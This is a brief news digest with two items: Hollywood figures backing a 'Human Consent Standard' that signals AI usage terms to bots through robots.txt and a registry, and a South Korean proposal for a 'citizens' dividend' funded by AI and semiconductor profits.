Several major Hollywood figures, such as George Clooney, Tom Hanks and Meryl Streep, are backing the new AI standard "Human Consent Standard", The Verge reports. Also behind the initiative are organizations such as Creative Artists Agency and actress Cate Blanchett, who describes the system as a way for both celebrities and ordinary people to protect their rights in the AI era. The standard makes it possible for users to state whether AI companies may use their material freely, only under certain conditions, or not at all. The aim is to give people greater control over how AI systems may use their faces, voices, characters and creative works. The system builds on the "Really Simple Licensing" standard and uses signals via robots.txt files to communicate the rules to AI bots. In June, a registry will also launch that AI systems can check and where both creators and private individuals will be able to verify their identity and state their AI terms.
South Korea's government is considering a kind of "citizens' dividend" in which parts of the enormous profits from the country's semiconductor and AI industry could be redistributed to the public, Nikkei Asia reports. The proposal comes from President Lee Jae Myung's policy chief, Kim Yong-beom, who warns that the AI economy risks creating large divides. According to him, AI and chip companies will accumulate very large profits while the middle class and people without AI skills risk falling behind. The government has not yet presented exactly how such a dividend would work in practice. One variant is that part of the profits would be used for initiatives such as support for young entrepreneurs, rural areas, artists, pensioners and AI education. According to Kim Yong-beom, South Korea now faces a choice: to continue as a traditional export-dependent economy that swings with the global business cycle, or to develop into a new type of AI-driven industrial state.